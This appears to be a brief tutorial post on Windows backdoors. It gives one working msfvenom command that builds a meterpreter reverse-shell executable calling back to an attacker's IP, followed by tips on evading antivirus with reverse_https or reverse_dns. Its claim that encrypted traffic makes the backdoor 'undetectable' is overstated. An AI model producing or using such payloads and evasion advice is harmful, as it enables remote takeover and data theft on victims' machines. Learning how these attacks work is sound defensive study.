0In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it, an attacker can gain access to the computer and personal data. A backdoor would communicate using the attackers IP and listens to commands from the attacker and execute them.
- VICTIM ( Listen to Incoming connections)
- VICTIM
- VICTIM(Executes COMMAND) --------SEND OUTPUT--------> ATTACKER
Generally, for learning the purpose, we can create a windows backdoor using msfvenom tool.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_Address LPORT=$port_number -f exe > malware.exe
Using the above command on Kali Linux, we can generate windows backdoor,-p is for payload, and we choose reverse_tcp LHOST is for the attacker IP address, LPORT is for the port attacker want to listen. Antivirus can detect these backdoors.
For evasion, there are many technics an attacker can use. Using reverse_https, reverse_dns etc. instead of reverse_tcp. Using reverse_https makes antivirus the traffic(Packets) is HTTPS port:443 related traffic and won't make a notice. Even if antivirus or a firewall inspect the traffic, the packets are encrypted, and so, the backdoor will be undetectable.
There are many ways these can be detected, and this proves how careful one should be while using the internet.
